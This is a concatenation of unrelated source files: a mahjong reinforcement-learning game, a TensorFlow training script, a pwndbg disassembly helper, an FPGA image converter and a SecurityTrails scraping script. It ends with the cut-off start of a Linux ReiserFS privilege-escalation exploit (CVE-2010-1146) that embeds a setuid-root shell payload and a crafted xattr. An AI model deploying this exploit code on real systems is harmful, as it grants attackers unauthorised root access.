max_tenpai_tiles = tenpai_tiles
if found_two_potential_combo:
if found_combo:
if max_return_tenpai > sum_tenpai:
return 1, max_return_tenpai, max_tenpai_tiles
else:
return 1, sum_tenpai, sum_tenpai_tiles
else:
return 1, max_return_tenpai, max_tenpai_tiles
if found_combo:
return 1, sum_tenpai, sum_tenpai_tiles
if found_one_potential_combo:
return 2, 0, []
else:
for i in range(player_hand.shape[0] - 1):
for j in range(i + 1, player_hand.shape[0]):
if player_hand[i] == player_hand[j]:
return 2, 0, []
return 3, 0, []
def calc_discarded_tile_count(self):
tile_count = np.array([4] * 19)
tile_count[0] = -123456789 # A large number made easier for debugging.
for i in self._player_discards:
tile_count[int(i)] -= 1
for i in self._other_player_discards.values():
for j in i:
tile_count[int(j)] -= 1
return tile_count
def calc_tile_count(self, disclose=False):
""" Return 19 integers where the index 0 is invalid. """
tile_count = np.array([4] * 19)
tile_count[0] = -123456789 # A large number made easier for debugging.
for i in self._player_hand:
tile_count[int(i)] -= 1
if disclose:
for i in self._opponents_hands:
tile_count[int(i)] -= 1
for i in self._player_discards:
tile_count[int(i)] -= 1
for i in self._other_player_discards.values():
for j in i:
tile_count[int(j)] -= 1
return tile_count
def calc_major_suit_count(self):
major_suit_count = 0
for i in self._player_hand:
if i <= 9:
major_suit_count += 1
if major_suit_count < int(self._player_hand.shape[0] / 2):
major_suit_count = self._player_hand.shape[0]
return major_suit_count
def calc_two_to_eight_count(self):
count = 0
for i in self._player_hand:
if i != 0 and i != 9 and i != 10 and i != 18:
count += 1
return count
@staticmethod
def calc_tile_distribution(tile_count):
""" Take the 18 integer list. """
return tile_count * 1.0 / np.sum(tile_count)
@staticmethod
def suit_shift(tiles):
tiles[np.argwhere(tiles > 9)] += 11
return tiles
def get_player_discards(self):
return self._player_discards
def process_dangerousness_input(self):
processed_inputs = []
# Get tile probability distribution.
tile_distribution = self.calc_discarded_tile_count()[1:]
processed_inputs += tile_distribution.tolist()
# Calculate tiles left and A/B ratio.
opponents_and_discards = self.get_opponents_discards()
opponent_discards = []
for p in opponents_and_discards:
opponent_discards = opponents_and_discards[p]
break
tiles_left = np.sum(self.calc_tile_count()[1:])
a_ratio = 0
b_ratio = 0
for t in opponent_discards:
if t <= 9:
a_ratio += 1
else:
b_ratio += 1
opponent_discard_length = len(opponent_discards)
if opponent_discard_length == 0:
return []
a_ratio /= opponent_discard_length
b_ratio /= opponent_discard_length
processed_inputs.append(tiles_left)
processed_inputs.append(a_ratio)
processed_inputs.append(b_ratio)
# Get last five discards.
if opponent_discard_length < 5:
copy_discards = opponent_discards.copy()
for i in range(5 - opponent_discard_length):
copy_discards.insert(0, 0)
processed_inputs += copy_discards[-5:]
else:
processed_inputs += opponent_discards[-5:]
return processed_inputs
```
#### File: python_app/tiny_mahjong/play.py
```python
from adft_player import *
from random_player import *
from ui_player import *
from greedy_player import *
# from rl_players.mcnn_player import *
# from rl_players.mc_player import *
from rl_players.q_player import *
from rl_players.dqn_player import *
from rl_players.full_dqn_player import *
from safety_first_player import SafetyFirstPlayer
def main():
# player1 = UserInputPlayer("Smart Human", log_game_state=True)
# player2 = QPlayer("Q BOT 1", EVAL)
player3 = DQNPlayer("DQN BOT TRAIN", TRAIN)
# player4 = FullDQNPlayer("Full DQN BOT SELF_PLAY", SELF_PLAY, log_game_state=True)
# player5 = GreedyPlayer("Greedy BOT")
# player6 = FullDQNPlayer("Full DQN BOT", EVAL, evaluate=True, log_game_state=True)
# player7 = SafetyFirstPlayer("Safety First Bot", EVAL, log_game_state=True)
game = Game(100000, [player3, RandomPlayer("RD")], win_on_discard=True, disclose_all=False)
game.play()
if __name__ == "__main__":
main()
```
#### File: tiny_mahjong/rl_players/dqn_player.py
```python
from model_generator import tiny_mahjong_dqn_model
from prioritised_double_dqn import PrioritisedDoubleDQN
from dqn_interface import *
from game import *
DQN_WEIGHTS_FILE = "tm_dqn_weights.h5"
WIN_REWARD = 1.0
DISCARD_REWARD = -0.01
LOSE_REWARD = -1.0
HAND_SIZE = 5
class DDQNTinyMahjong(PrioritisedDoubleDQN):
def __init__(self, mode, load=True):
PrioritisedDoubleDQN.__init__(self, action_count=5, weights_file_path=DQN_WEIGHTS_FILE,
replay_memory_size=100000, mode=mode,
target_update_interval=10000, load_previous_model=load)
@staticmethod
def _pre_process(input_data):
assert len(input_data) == HAND_SIZE
reshaped_input = np.array([[0] * 18] * 5)
for tile_index in range(HAND_SIZE):
tile = int(input_data[tile_index]) - 1
if tile >= 0:
reshaped_input[tile_index][tile] = 1
reshaped_input = reshaped_input.reshape(1, 5, 18, 1)
return reshaped_input
@staticmethod
def _create_model(input_shape=None, action_count=None):
return tiny_mahjong_dqn_model()
class DQNPlayer(Player):
def __init__(self, name, mode):
Player.__init__(self, name)
self._mode = mode
self._dqn_model = DDQNTinyMahjong(mode)
self._prev_hand = None
self._prev_action = None
self._drain_rounds = 0
self._total_rounds = 0
def initial_hand_obtained(self):
Player.initial_hand_obtained(self)
self._prev_hand = None
self._prev_action = None
self._total_rounds += 1
def tile_picked(self):
Player.tile_picked(self)
training = self._prev_hand is not None and self._mode == TRAIN
if self.test_win():
if training:
self._dqn_model.notify_reward(WIN_REWARD)
self._dqn_model.append_memory_and_train(self._prev_hand,
self._prev_action,
WIN_REWARD,
self.hand,
True)
return WIN, -1
else:
if training:
self._dqn_model.notify_reward(DISCARD_REWARD)
action = self._dqn_model.make_action(self.hand)
if training:
self._dqn_model.append_memory_and_train(self._prev_hand,
self._prev_action,
DISCARD_REWARD,
self.hand,
False)
self._prev_hand = np.copy(self.hand)
self._prev_action = action
return DISCARD, action
def player_discarded(self, discarded_tile):
training = self._prev_hand is not None and self._mode == TRAIN
if self.test_win_hand(self.hand, discarded_tile):
if training:
self._dqn_model.notify_reward(WIN_REWARD)
self._dqn_model.append_memory_and_train(self._prev_hand,
self._prev_action,
WIN_REWARD,
np.append(self.hand, 0),
True)
return WIN
else:
return PASS
def game_ends(self, win, lose, self_win=False, drain=False):
Player.game_ends(self, win, lose, self_win, drain)
if lose:
training = self._prev_hand is not None and self._mode == TRAIN
if training:
if self_win:
final_reward = DISCARD_REWARD
else:
final_reward = LOSE_REWARD
if self.hand.shape[0] == 4:
self.hand = np.append(self.hand, 0)
self._dqn_model.notify_reward(final_reward)
self._dqn_model.append_memory_and_train(self._prev_hand,
self._prev_action,
final_reward,
self.hand,
True)
# Summary.
if drain:
self._drain_rounds += 1
self._dqn_model.episode_finished({"Win rate":
self.rounds_won * 1.0 / self._total_rounds,
"Lose rate":
self.rounds_lost * 1.0 / self._total_rounds,
"Drain rate":
self._drain_rounds * 1.0 / self._total_rounds})
if self._mode == PLAY:
print(self.name + ":")
if win:
print("Won!")
elif self._mode == EVAL:
print(self.name + ":")
print("Win rate:", str(self.rounds_won * 100.0 / self._total_rounds) + "%, Lose rate:",
str(self.rounds_lost * 100.0 / self._total_rounds) + "%")
elif self._mode == DEBUG:
if win:
print(self.name, "won!")
```
#### File: rl_players/TileCoder/multi_tile_coder.py
```python
import h5py
from math import sqrt
import numpy as np
SAVER_WEIGHTS_KEY = "tile_coding_tiles"
class MultiTileCoder:
def __init__(self, dims, limits, tilings, output_number, step_size=0.1, offset=lambda n: 2 * np.arange(n) + 1):
self._output_numbers = output_number
self.tile_coders = []
for i in range(output_number):
self.tile_coders.append(TileCoder(dims, limits, tilings, step_size, offset))
def predict(self, input_data):
predictions = np.zeros((input_data.shape[0], self._output_numbers))
for i in range(input_data.shape[0]):
single_prediction = []
for t in self.tile_coders:
single_prediction.append(t[input_data[i]])
predictions[i] = single_prediction
return predictions
def train_on_batch(self, Xs, Ys):
total_loss = 0
for i in range(Xs.shape[0]):
for j in range(self._output_numbers):
total_loss += sqrt((Ys[i][j] - self.tile_coders[j][Xs[i]]) ** 2)
self.tile_coders[j][Xs[i]] = Ys[i][j]
return total_loss
def get_weights(self):
return self
def set_weights(self, weights):
for i in range(len(self.tile_coders)):
self.tile_coders[i].tiles = weights.tile_coders[i].tiles[:]
def save_weights(self, file_path):
h5_file = h5py.File(file_path, "w")
for i in range(len(self.tile_coders)):
h5_file.create_dataset(SAVER_WEIGHTS_KEY + str(i), data=self.tile_coders[i].tiles)
h5_file.close()
def load_weights(self, file_path):
h5_file = h5py.File(file_path, "r")
current_index = 0
while SAVER_WEIGHTS_KEY + str(current_index) in h5_file:
self.tile_coders[current_index].tiles = h5_file[SAVER_WEIGHTS_KEY + str(current_index)][:]
current_index += 1
h5_file.close()
class TileCoder:
def __init__(self, dims, limits, tilings, step_size=0.1, offset=lambda n: 2 * np.arange(n) + 1):
offset_vec = offset(len(dims))
tiling_dims = np.array(dims, dtype=np.int) + offset_vec
self._offsets = offset_vec * np.repeat([np.arange(tilings)], len(dims), 0).T / float(tilings)
self._limits = np.array(limits)
self._norm_dims = np.array(dims) / (self._limits[:, 1] - self._limits[:, 0])
self._alpha = step_size / tilings
self.tiles = np.zeros(tilings * np.prod(tiling_dims))
self._tile_base_ind = np.prod(tiling_dims) * np.arange(tilings)
self._hash_vec = np.ones(len(dims), dtype=np.int)
for i in range(len(dims) - 1):
self._hash_vec[i + 1] = tiling_dims[i] * self._hash_vec[i]
def _get_tiles(self, x):
off_coordinates = ((x - self._limits[:, 0]) * self._norm_dims + self._offsets).astype(int)
return self._tile_base_ind + np.dot(off_coordinates, self._hash_vec)
def __getitem__(self, x):
tile_ind = self._get_tiles(x)
return np.sum(self.tiles[tile_ind])
def __setitem__(self, x, val):
tile_ind = self._get_tiles(x)
self.tiles[tile_ind] += self._alpha * (val - np.sum(self.tiles[tile_ind]))
```
#### File: python_app/utils/mahjong_hand_converter.py
```python
import numpy as np
def tile_to_byte(t):
if t[0].isdigit():
t_value = int(t[0])
else:
# Avoiding White Dragon & West Wind, so change to Bai Dragon.
if t[1] == "d" and t[0] == "w":
t_value = 6
else:
t_value = {"e": 1, "s": 2, "w": 3, "n": 4, "r": 5, "b": 6, "g": 7}[t[0]]
t_type = {"m": 0, "p": 1, "s": 2, "w": 3, "d": 3}[t[1]]
t_meld = 0
if len(t) > 2:
t_meld = int(t[2])
return t_meld << 6 | t_type << 4 | t_value
def byte_to_tile(b):
types = ["m", "p", "s", "z"]
return str(b & 0b1111) + types[(b & 0b110000) >> 4]
def to_mahjong_hand(hand):
ret_hand = []
for i in hand:
ret_hand.append(tile_to_byte(i))
ret_hand.sort()
return ret_hand
def to_string_hand(hand):
ret_hand = []
for i in hand:
ret_hand.append(byte_to_tile(i))
return " ".join(ret_hand)
def transform_hand_to_one_hot(byte_hand):
ret_hand = []
for i in byte_hand:
if type(i).__name__ == "Tile":
i = i.get_data()
# Convert to one-hot encoding.
converted_hand = 1 << (2 - ((i & 0b11000000) >> 6))
converted_hand <<= 13
converted_hand |= 1 << (3 - ((i & 0b110000) >> 4) + 9)
converted_hand |= 1 << (9 - (i & 0b1111))
ret_hand += list(bin(converted_hand)[2:].zfill(16))
return ret_hand
def transform_one_hot_to_cnn_matrix(csv_hand):
csv_hand = np.array([csv_hand])
return csv_hand.reshape(csv_hand.shape[0], 14, 16, 1)
``` |
{
"source": "0xsx/nnmaker",
"score": 3
} |
#### File: nnetmaker/loader/secondaries.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from nnetmaker.util import *
def _parse_shape_and_dtype(args_dict, shapes_dict, dtypes_dict):
"""Parses the shape and dtype specified in `args_dict` and checks whether they
refer to existing tensors, and returns the dictionary key to use if so.
Otherwise parses and returns literal shape and dtype."""
args_val = ArgumentsValidator(args_dict, "Secondary feature")
with args_val:
shape = args_val.get("shape", [ATYPE_STRING, ATYPE_INTS_LIST], True)
dtype = args_val.get("dtype", ATYPE_STRING, True)
try:
shape_key = shape
static_shape = shapes_dict[shape_key]
except KeyError:
shape_key = None
parsed_shape = shape
if (shape[0] == "[" and shape[-1] == "]") or (shape[0] == "(" and shape[-1] == ")"):
parsed_shape = shape[1:-1]
try:
static_shape = [int(x.strip()) for x in parsed_shape.split(",")]
except:
raise ValueError("Invalid shape: %s" % shape)
try:
dtype = dtypes_dict[dtype]
except KeyError:
try:
dtype = tf.as_dtype(dtype)
except TypeError:
raise ValueError("Invalid dtype: %s" % dtype)
return shape_key, static_shape, dtype
class OnesFeature(object):
"""Secondary feature for returning a tensor of ones."""
def __init__(self, args_dict, shapes_dict, dtypes_dict):
shape_key, static_shape, dtype = _parse_shape_and_dtype(args_dict, shapes_dict, dtypes_dict)
self._shape_key = shape_key
self._static_shape = static_shape
self._dtype = dtype
def get_static_shape(self):
return self._static_shape
def get_dtype(self):
return self._dtype
def get_tensor(self, primary_tensors_dict):
if self._shape_key is not None:
with tf.control_dependencies([primary_tensors_dict[self._shape_key]]):
tensor = tf.ones_like(primary_tensors_dict[self._shape_key], dtype=self._dtype)
else:
tensor = tf.ones(self._static_shape, dtype=self._dtype)
return tensor
```
#### File: 0xsx/nnmaker/train_estimator.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2" # Filter everything but errors.
import logging
import numpy as np
import nnetmaker as nn
import tensorflow as tf
import traceback
class TrainCheckpointSaverListener(tf.train.CheckpointSaverListener):
"""CheckpointSaverListener that just logs an info message every save."""
def __init__(self):
self._logger = logging.getLogger()
def after_save(self, session, global_step_value):
self._logger.info("%d: Wrote checkpoint." % global_step_value)
def run_training(model, train_loader, val_loader, params, logger, np_rand_state):
"""Runs training and evaluation until stopped."""
run_config = tf.estimator.RunConfig(model_dir=model.model_dir,
tf_random_seed=np_rand_state.randint(12345, 2**32),
save_checkpoints_secs=params["save_time"])
estimator = tf.estimator.Estimator(model_fn=model.build_model_fn(),
config=run_config, params=params)
try:
train_spec = tf.estimator.TrainSpec(input_fn=train_loader.build_input_fn())
eval_spec = tf.estimator.EvalSpec(input_fn=val_loader.build_input_fn(),
steps=None, throttle_secs=params["val_throttle_time"])
tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)
except KeyboardInterrupt:
logger.info("Stopped by user.")
def main(config_filename):
try:
# Parse and validate the specified configuration.
tup = nn.load_config(config_filename)
rand_seed = tup[0]
epsilon = tup[1]
model_type = tup[2]
model_args = tup[3]
input_args = tup[4]
init_args = tup[5]
train_args = tup[6]
logger_args = tup[7]
# Initialize the logger.
nn.configure_logger(logger_args)
logger = logging.getLogger()
# Initialize random number generators.
tf_rand_seed, np_rand_seed = nn.configure_seeds(2, rand_seed)
tf.set_random_seed(tf_rand_seed)
np_rand_state = np.random.RandomState(np_rand_seed)
# Initialize the model and input loaders.
model = nn.MODELS[model_type](model_args, epsilon=epsilon)
train_loader = nn.configure_input(model.input_names, model.target_names,
input_args, nn.INPUT_TRAIN)
val_loader = nn.configure_input(model.input_names, model.target_names,
input_args, nn.INPUT_VAL)
params = nn.configure_estimator_params(init_args, train_args)
assert train_loader.target_batch_size == val_loader.target_batch_size
model._batch_size = train_loader.target_batch_size
# Run training loop.
run_training(model, train_loader, val_loader, params, logger, np_rand_state)
except Exception as ex:
logger = logging.getLogger()
ex_str = traceback.format_exc()
logger.error(ex_str)
exit(1)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("config_filename", help="Filename of json model config file")
args = parser.parse_args()
main(os.path.realpath(args.config_filename))
``` |
{
"source": "0xTac/ppwndbg",
"score": 3
} |
#### File: pwndbg/disasm/x86.py
```python
import collections
from capstone import *
from capstone.x86 import *
import pwndbg.arch
import pwndbg.memory
import pwndbg.regs
import pwndbg.typeinfo
groups = {v:k for k,v in globals().items() if k.startswith('X86_GRP_')}
ops = {v:k for k,v in globals().items() if k.startswith('X86_OP_')}
regs = {v:k for k,v in globals().items() if k.startswith('X86_REG_')}
access = {v:k for k,v in globals().items() if k.startswith('CS_AC_')}
pc = X86_REG_RSP
class DisassemblyAssistant(pwndbg.disasm.arch.DisassemblyAssistant):
def regs(self, instruction, reg):
if reg == X86_REG_RIP:
return instruction.address + instruction.size
elif instruction.address == pwndbg.regs.pc:
name = instruction.reg_name(reg)
return pwndbg.regs[name]
else:
return None
def memory(self, instruction, op):
current = (instruction.address == pwndbg.regs.pc)
# The only register we can reason about if it's *not* the current
# instruction is $rip. For example:
# lea rdi, [rip - 0x1f6]
target = 0
# There doesn't appear to be a good way to read from segmented
# addresses within GDB.
if op.mem.segment != 0:
return None
if op.mem.base != 0:
base = self.regs(instruction, op.mem.base)
if base is None:
return None
target += base
if op.mem.disp != 0:
target += op.value.mem.disp
if op.mem.index != 0:
scale = op.mem.scale
index = self.regs(instruction, op.mem.index)
if index is None:
return None
target += (scale * index)
return target
def memory_sz(self, instruction, op):
arith = False
segment = op.mem.segment
disp = op.value.mem.disp
base = op.value.mem.base
index = op.value.mem.index
scale = op.value.mem.scale
sz = ''
if segment != 0:
sz += '%s:' % instruction.reg_name(segment)
if base != 0:
sz += instruction.reg_name(base)
arith = True
if index != 0:
if arith:
sz += ' + '
index = pwndbg.regs[instruction.reg_name(index)]
sz += "%s*%#x" % (index, scale)
arith = True
if op.mem.disp != 0:
if arith and op.mem.disp < 0:
sz += ' - '
elif arith and op.mem.disp >= 0:
sz += ' + '
sz += '%#x' % abs(op.mem.disp)
sz = '[%s]' % sz
return sz
def register(self, instruction, operand):
if operand.value.reg != X86_REG_RIP:
return super(DisassemblyAssistant, self).register(instruction, operand)
return instruction.address + instruction.size
def next(self, instruction, call=False):
# Only enhance 'ret'
if X86_INS_RET != instruction.id or len(instruction.operands) > 1:
return super(DisassemblyAssistant, self).next(instruction, call)
# Stop disassembling at RET if we won't know where it goes to
if instruction.address != pwndbg.regs.pc:
return None
# Otherwise, resolve the return on the stack
pop = 0
if instruction.operands:
pop = instruction.operands[0].int
address = (pwndbg.regs.sp) + (pwndbg.arch.ptrsize * pop)
if pwndbg.memory.peek(address):
return int(pwndbg.memory.poi(pwndbg.typeinfo.ppvoid, address))
def condition(self, instruction):
# JMP is unconditional
if instruction.id in (X86_INS_JMP, X86_INS_RET, X86_INS_CALL):
return None
# We can't reason about anything except the current instruction
if instruction.address != pwndbg.regs.pc:
return False
efl = pwndbg.regs.eflags
cf = efl & (1<<0)
pf = efl & (1<<2)
af = efl & (1<<4)
zf = efl & (1<<6)
sf = efl & (1<<7)
of = efl & (1<<11)
return {
X86_INS_CMOVA: not (cf or zf),
X86_INS_CMOVAE: not cf,
X86_INS_CMOVB: cf,
X86_INS_CMOVBE: cf or zf,
X86_INS_CMOVE: zf,
X86_INS_CMOVG: not zf and (sf == of),
X86_INS_CMOVGE: sf == of,
X86_INS_CMOVL: sf != of,
X86_INS_CMOVLE: zf or (sf != of),
X86_INS_CMOVNE: not zf,
X86_INS_CMOVNO: not of,
X86_INS_CMOVNP: not pf,
X86_INS_CMOVNS: not sf,
X86_INS_CMOVO: of,
X86_INS_CMOVP: pf,
X86_INS_CMOVS: sf,
X86_INS_JA: not (cf or zf),
X86_INS_JAE: not cf,
X86_INS_JB: cf,
X86_INS_JBE: cf or zf,
X86_INS_JE: zf,
X86_INS_JG: not zf and (sf == of),
X86_INS_JGE: sf == of,
X86_INS_JL: sf != of,
X86_INS_JLE: zf or (sf != of),
X86_INS_JNE: not zf,
X86_INS_JNO: not of,
X86_INS_JNP: not pf,
X86_INS_JNS: not sf,
X86_INS_JO: of,
X86_INS_JP: pf,
X86_INS_JS: sf,
}.get(instruction.id, None)
assistant = DisassemblyAssistant('i386')
assistant = DisassemblyAssistant('x86-64')
``` |
{
"source": "0xtaruhi/PlaneWar",
"score": 3
} |
#### File: PlaneWar/utils/gen_coe.py
```python
import numpy as np
import matplotlib.pyplot as plt
import cv2
class GenCoe:
def __init__(self, dir:str, filename:str, mode="gray"):
self.dir = dir
self.filename = filename
loc = self.dir + "\\" + self.filename
self.img = cv2.imread(loc, cv2.IMREAD_UNCHANGED)
self.height, self.width, g = (self.img.shape)
self.grayinfo = np.empty((self.height * self.width)).astype(np.int32)
self.alphainfo = np.empty((self.height * self.width)).astype(np.int32)
self.colorinfo = np.empty((self.height * self.width, 3)).astype(np.int32)
self.monoinfo = np.empty((self.height, self.width)).astype(np.int8)
if mode == "gray":
self.gray()
elif mode == "mono":
self.mono()
elif mode == "color":
self.color()
def readimage(self, dir, filename, mode="gray"):
GenCoe.__init__(dir, filename, mode);
def gray(self):
def list_aver(list):
aver = 0
for item in list:
aver += item
aver /= len(list)
return aver
for row_idx in range(self.height):
for col_idx in range(self.width):
self.grayinfo[row_idx * self.width + col_idx] = (int)(list_aver(self.img[row_idx][col_idx][0:3]/16))
self.alphainfo[row_idx * self.width + col_idx] = (int)(self.img[row_idx][col_idx][3]/128)
def color(self):
for row_idx in range(self.height):
for col_idx in range(self.width):
self.colorinfo[row_idx * self.width + col_idx][0] = (int)(self.img[row_idx][col_idx][2] / 16)
self.colorinfo[row_idx * self.width + col_idx][1] = (int)(self.img[row_idx][col_idx][1] / 16)
self.colorinfo[row_idx * self.width + col_idx][2] = (int)(self.img[row_idx][col_idx][0] / 16)
self.alphainfo[row_idx * self.width + col_idx] = (int)(self.img[row_idx][col_idx][3] / 128)
def mono(self):
for row_idx in range(self.height):
for col_idx in range(self.width):
# self.monoinfo[row_idx][col_idx] = (int)(self.img[row_idx][col_idx][3] / 128)
pixel = self.img[row_idx][col_idx]
self.monoinfo[row_idx][col_idx] = 1 if (int(pixel[0]) + int(pixel[1]) + int(pixel[2]) < 300) else 0
def get_grayinfo(self):
return self.grayinfo
def get_alphainfo(self):
return self.alphainfo
def get_monoinfo(self):
return self.monoinfo
def get_colorinfo(self):
return self.colorinfo
def to_binary(num, bitlen=-1):
res = bin(num)[2:]
if bitlen == -1:
return res
else:
for i in range(bitlen - len(res)):
res = '0' + res
return res
def generate_coe(dir, filename, *infos):
coefile_location = dir + "\\" + filename
depth = len(infos[0][1])
with open(coefile_location, 'w') as f:
f.write("memory_initialization_radix = 2;\n")
f.write("memory_initialization_vector = \n")
for i in range(depth):
rowinfo = ""
for info in infos:
if(info[0] == 'gray'):
rowinfo += GenCoe.to_binary(info[1][i], bitlen=4)
elif(info[0] == 'alpha'):
rowinfo += str(info[1][i])
elif(info[0] == 'mono'):
for j in range(len(info[1][i])):
rowinfo += str(info[1][i][j]) + ",\n"
elif(info[0] == 'color'):
rowinfo += GenCoe.to_binary(info[1][i][0], bitlen=4)
rowinfo += GenCoe.to_binary(info[1][i][1], bitlen=4)
rowinfo += GenCoe.to_binary(info[1][i][2], bitlen=4)
if info[0] == 'mono':
f.write(rowinfo)
else:
f.write(rowinfo + ",\n")
print("Generate COE file " + filename + " successfully, the depth is " + str(depth))
if __name__ == "__main__":
ori_dir = "D:\\fpga\\project\PlaneWar\\src\\img\\origin"
des_dir = "D:\\fpga\\project\PlaneWar\\src\\img"
def gen_me():
me1 = GenCoe(ori_dir, "me1.png")
me2 = GenCoe(ori_dir, "me2.png")
me_destroy_1 = GenCoe(ori_dir, "me_destroy_1.png")
me_destroy_3 = GenCoe(ori_dir, "me_destroy_3.png")
me_destroy_4 = GenCoe(ori_dir, "me_destroy_4.png")
# GenCoe.generate_coe(des_dir, 'me.coe', ('alpha', me1.get_alphainfo()), ('gray', me1.get_grayinfo()), \
# ('alpha', me2.get_alphainfo()), ('gray', me2.get_grayinfo()), \
# ('gray', me_destroy_1.get_grayinfo()), ('gray', me_destroy_3.get_grayinfo()), \
# ('gray', me_destroy_4.get_grayinfo()))
GenCoe.generate_coe(des_dir, 'me.coe', ('alpha', me1.get_alphainfo()), ('gray', me1.get_grayinfo()),\
('alpha', me2.get_alphainfo()), ('gray', me2.get_grayinfo()),\
('alpha', me_destroy_1.get_alphainfo()), ('gray', me_destroy_1.get_grayinfo()), \
('alpha', me_destroy_3.get_alphainfo()), ('gray', me_destroy_3.get_grayinfo()))
def gen_enemy1():
enemy1 = GenCoe(ori_dir, "enemy1.png")
enemy1_down1 = GenCoe(ori_dir, "enemy1_down1.png")
enemy1_down2 = GenCoe(ori_dir, "enemy1_down2.png")
enemy1_down3 = GenCoe(ori_dir, "enemy1_down3.png")
# enemy1_down4 = GenCoe(ori_dir, "enemy1_down4.png")
# GenCoe.generate_coe(des_dir, 'enemy1.coe', ('alpha', enemy1.get_alphainfo()), ('gray', enemy1.get_grayinfo()), \
# ('gray', enemy1_down1.get_grayinfo()), ('gray', enemy1_down2.get_grayinfo()), \
# ('alpha', enemy1_down3.get_alphainfo()), ('gray', enemy1_down3.get_grayinfo()))
GenCoe.generate_coe(des_dir, 'enemy1.coe', ('alpha', enemy1.get_alphainfo()), ('gray', enemy1.get_grayinfo()), \
('alpha', enemy1_down1.get_alphainfo()), ('gray', enemy1_down1.get_grayinfo()), \
('alpha', enemy1_down2.get_alphainfo()), ('gray', enemy1_down2.get_grayinfo()), \
('alpha', enemy1_down3.get_alphainfo()), ('gray', enemy1_down3.get_grayinfo()))
def gen_enemy2():
enemy2 = GenCoe(ori_dir, "enemy2.png")
enemy2_hit = GenCoe(ori_dir, "enemy2_hit.png")
enemy2_down1 = GenCoe(ori_dir, "enemy2_down1.png")
enemy2_down2 = GenCoe(ori_dir, "enemy2_down2.png")
enemy2_down3 = GenCoe(ori_dir, "enemy2_down3.png")
GenCoe.generate_coe(des_dir, 'enemy2.coe', \
('alpha', enemy2.get_alphainfo()), ('gray', enemy2.get_grayinfo()),\
('alpha', enemy2_hit.get_alphainfo()), ('gray', enemy2_hit.get_grayinfo()),\
('alpha', enemy2_down1.get_alphainfo()), ('gray', enemy2_down1.get_grayinfo()),\
('alpha', enemy2_down2.get_alphainfo()), ('gray', enemy2_down2.get_grayinfo()),\
('alpha', enemy2_down3.get_alphainfo()), ('gray', enemy2_down3.get_grayinfo()))
def gen_enemy3():
enemy3_n1 = GenCoe(ori_dir, 'enemy3_n1.png')
enemy3_n2 = GenCoe(ori_dir, 'enemy3_n2.png')
enemy3_hit = GenCoe(ori_dir, 'enemy3_hit.png')
enemy3_down1 = GenCoe(ori_dir, 'enemy3_down1.png')
enemy3_down2 = GenCoe(ori_dir, 'enemy3_down2.png')
enemy3_down3 = GenCoe(ori_dir, 'enemy3_down3.png')
enemy3_down4 = GenCoe(ori_dir, 'enemy3_down4.png')
enemy3_down5 = GenCoe(ori_dir, 'enemy3_down5.png')
GenCoe.generate_coe(des_dir, 'enemy3.coe', \
('alpha', enemy3_n1.get_alphainfo()), ('gray', enemy3_n1.get_grayinfo()), \
# ('alpha', enemy3_n2.get_alphainfo()), ('gray', enemy3_n2.get_grayinfo()), \
('alpha', enemy3_hit.get_alphainfo()), ('gray', enemy3_hit.get_grayinfo()), \
# ('alpha', enemy3_down1.get_alphainfo()), ('gray', enemy3_down1.get_grayinfo()), \
# ('alpha', enemy3_down2.get_alphainfo()), ('gray', enemy3_down2.get_grayinfo()), \
('alpha', enemy3_down3.get_alphainfo()), ('gray', enemy3_down3.get_grayinfo()), \
# ('alpha', enemy3_down4.get_alphainfo()), ('gray', enemy3_down4.get_grayinfo()), \
('alpha', enemy3_down5.get_alphainfo()), ('gray', enemy3_down5.get_grayinfo()))
def gen_startinfo():
startinfo = GenCoe(ori_dir, 'startinfo.png', mode="mono")
GenCoe.generate_coe(des_dir, 'startinfo.coe', ('mono', startinfo.get_monoinfo()))
# gen_enemy1()
def gen_bomb():
bomb_supply = GenCoe(ori_dir, 'bomb_supply.png', mode='color')
GenCoe.generate_coe(des_dir, 'bomb.coe', ('alpha', bomb_supply.get_alphainfo()),('color', bomb_supply.get_colorinfo()))
def gen_bullet_supply():
bullet_supply = GenCoe(ori_dir, 'bullet_supply.png', mode='color')
GenCoe.generate_coe(des_dir, 'bullet_supply.coe', ('alpha', bullet_supply.get_alphainfo()), ('color', bullet_supply.get_colorinfo()))
def gen_number():
number_dir = "D:\\fpga\\project\\PlaneWar\\src\\img\\origin\\numbers"
for i in range(10):
filename = str(i) + ".png"
number = GenCoe(number_dir, filename, mode='mono')
GenCoe.generate_coe(des_dir, str(i) + ".coe", ('mono', number.get_monoinfo()))
gen_me()
``` |
{
"source": "0xtavian/get_acquisitions.py",
"score": 3
} |
#### File: 0xtavian/get_acquisitions.py/get_acquisitions.py
```python
import requests,sys
import base64
import re
import argparse
from bs4 import BeautifulSoup
parser = argparse.ArgumentParser(description='Enter domain name (-d) to pull acquisition from SecurityTrails.com. Required arguments: email address (-e) and password (-p)')
parser.add_argument("-d")
parser.add_argument("-e")
parser.add_argument("-p")
args = parser.parse_args()
d = args.d
e = args.e
p = args.p
def get_acquisitions():
s=requests.Session()
r = s.get('https://securitytrails.com/app/account')
soup = BeautifulSoup(r.content, 'html.parser')
all_scripts = soup.find_all('script')
precsrf = all_scripts[9]
for line in precsrf:
csrf = line.split('"')[3]
r2 = s.post('https://securitytrails.com/app/api/console/account/login', json={"_csrf_token": csrf , "login":{"email": "{0}".format(e), "password":"{<PASSWORD>)}})
r3 = s.get('https://securitytrails.com/app/api/v1/surface_browser/acquisitions/{0}'.format(d))
content = r3.content
print(content.decode('utf-8'))
get_acquisitions()
``` |
{
"source": "0xToast/Linux-Kernel-Exploits",
"score": 3
} |
#### File: 2010/CVE-2010-1146/12130.py
```python
import os, sys
SHELL = 'int main(void) { setgid(0); setuid(0); execl("/bin/sh", "sh", 0); }'
XATTR = '\x41\x58\x46\x52\xc1\x00\x00\x02\x01\x00\x00\x02\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
def err(txt):
print '[-] error: %s' % txt
sys.exit(1)
def msg(txt):
print '[+] %s' % txt
def main():
msg('checking for reiserfs mount with user_xattr mount option')
f = open('/etc/fstab')
for line in f:
if 'reiserfs' in line and 'user_xattr' in line:
break
else:
err('failed to find a reiserfs mount with user_xattr')
f.close()
msg('checking for private xattrs directory at /.reiserfs_priv/xattrs')
